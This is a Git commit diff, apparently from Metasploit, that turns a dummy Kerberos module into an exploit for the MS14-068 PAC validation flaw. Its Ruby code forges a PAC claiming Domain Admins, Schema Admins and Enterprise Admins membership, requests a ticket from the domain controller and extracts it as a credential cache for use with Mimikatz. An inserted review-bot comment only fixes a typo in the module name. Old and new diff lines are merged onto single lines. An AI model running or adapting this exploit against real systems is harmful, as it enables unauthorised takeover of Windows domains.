Clean module code

bug/bundler_fix
jvazquez-r7 2014-12-22 14:29:02 -06:00
parent dabc890b2f
commit 20ab14d7a3
1 changed files with 54 additions and 33 deletions


@ -12,9 +12,14 @@ class Metasploit4 < Msf::Auxiliary
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Dummy Kerberos testing module', 'Name' => 'MS14-068 Microsfot Kerberos Checksum Validation Vulnerability',
'Description' => %q{ 'Description' => %q{
Dummy Kerberos testing module This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem
exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS
request, allowing a domain user to forge a PAC with arbitrary privileges, including Domain
Administrator. This module outputs a MIT Kerberos Credential Cache with the privileged
ticket, which can be imported, for example, on Mimikatz. It has been tested successfully on
Windows 2008.
}, },
'Author' => 'Author' =>
[ [
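Review bot: The new `'Name'` string at the top of the hunk misspells the vendor as `Microsfot`; this value is what module listings and searches display, so it should read `'Name' => 'MS14-068 Microsoft Kerberos Checksum Validation Vulnerability'`. The expanded `'Description'` is otherwise a clear improvement over the placeholder text it replaces, and the "tested successfully on Windows 2008" sentence is worth keeping so users know the verified target. The `initialize` method and the `update_info` hash continue past the end of this hunk.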
@ -34,76 +39,92 @@ class Metasploit4 < Msf::Auxiliary
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'DisclosureDate' => 'Nov 18 2014' 'DisclosureDate' => 'Nov 18 2014'
)) ))
register_options(
[
OptString.new('USER', [ true, 'The Domain User', 'juan']),
OptString.new('PASSWORD', [ true, 'The Domain User password', 'juan']),
OptString.new('DOMAIN', [ true, 'The Domain Ex: DEMO.LOCAL', 'DEMO.LOCAL']),
OptString.new('DOMAIN_SID', [ true, 'The Domain SID Ex: S-1-5-21-1755879683-3641577184-3486455962', 'S-1-5-21-1755879683-3641577184-3486455962'])
], self.class)
end end
def run def run
print_status("#{peer} - Connecting with the KDC...")
connect(:rhost => datastore['RHOST']) connect(:rhost => datastore['RHOST'])
print_status("Sending AS-REQ...")
my_key = OpenSSL::Digest.digest('MD4', Rex::Text.to_unicode('juan')) unicode_password = Rex::Text.to_unicode(datastore['PASSWORD'])
password_digest = OpenSSL::Digest.digest('MD4', unicode_password)
pre_auth = [] pre_auth = []
pre_auth << build_as_pa_time_stamp(key: my_key) pre_auth << build_as_pa_time_stamp(key: password_digest)
pre_auth << build_pa_pac_request pre_auth << build_pa_pac_request
pre_auth pre_auth
print_status("#{peer} - Sending AS-REQ...")
res = send_request_as( res = send_request_as(
client_name: 'juan', client_name: "#{datastore['USER']}",
server_name: 'krbtgt/DEMO.LOCAL', server_name: "krbtgt/#{datastore['DOMAIN']}",
realm: 'DEMO.LOCAL', realm: "#{datastore['DOMAIN']}",
key: my_key, key: password_digest,
pa_data: pre_auth pa_data: pre_auth
) )
unless res.msg_type == 11 unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
print_error("invalid response :(") print_error("#{peer} - Invalid AS-REP, aborting...")
return return
end end
print_good("good answer!") print_status("#{peer} - Parsing AS-REP...")
print_status("Parsing AS-REP...")
session_key = extract_session_key(res, my_key)
logon_time = extract_logon_time(res, my_key)
session_key = extract_session_key(res, password_digest)
logon_time = extract_logon_time(res, password_digest)
ticket = res.ticket ticket = res.ticket
print_status("Sending TGS-REQ...")
pre_auth = [] pre_auth = []
pre_auth << build_pa_pac_request pre_auth << build_pa_pac_request
groups = [
513, # DOMAIN_USERS
512, # DOMAIN_ADMINS
520, # GROUP_POLICY_CREATOR_OWNERS
518, # SCHEMA_ADMINISTRATORS
519 # ENTERPRISE_ADMINS
]
pac = build_pac( pac = build_pac(
client_name: 'juan', client_name: datastore['USER'],
group_ids: [513, 512, 520, 518, 519], group_ids: groups,
domain_id: 'S-1-5-21-1755879683-3641577184-3486455962', domain_id: datastore['DOMAIN_SID'],
realm: 'DEMO.LOCAL', realm: datastore['DOMAIN'],
logon_time: logon_time, logon_time: logon_time,
) )
auth_data = build_pac_authorization_data(pac: pac) auth_data = build_pac_authorization_data(pac: pac)
print_status("#{peer} - Sending TGS-REQ...")
res = send_request_tgs( res = send_request_tgs(
client_name: 'juan', client_name: datastore['USER'],
server_name: 'krbtgt/DEMO.LOCAL', server_name: "krbtgt/#{datastore['DOMAIN']}",
realm: 'DEMO.LOCAL', realm: datastore['DOMAIN'],
key: my_key, key: password_digest,
logon_time: logon_time, logon_time: logon_time,
session_key: session_key, session_key: session_key,
ticket: ticket, ticket: ticket,
group_ids: [513, 512, 520, 518, 519], group_ids: groups,
domain_id: 'S-1-5-21-1755879683-3641577184-3486455962', domain_id: datastore['DOMAIN_SID'],
auth_data: auth_data, auth_data: auth_data,
pa_data: pre_auth pa_data: pre_auth
) )
unless res.msg_type == 13 unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
print_error("invalid response :(") print_error("#{peer} - Invalid TGS-REP, aborting...")
return return
end end
print_good("Valid TGS-Response") print_good("#{peer} - Valid TGS-Response, extracting credentials...")
cache = extract_kerb_creds(res, 'AAAABBBBCCCCDDDD') cache = extract_kerb_creds(res, 'AAAABBBBCCCCDDDD')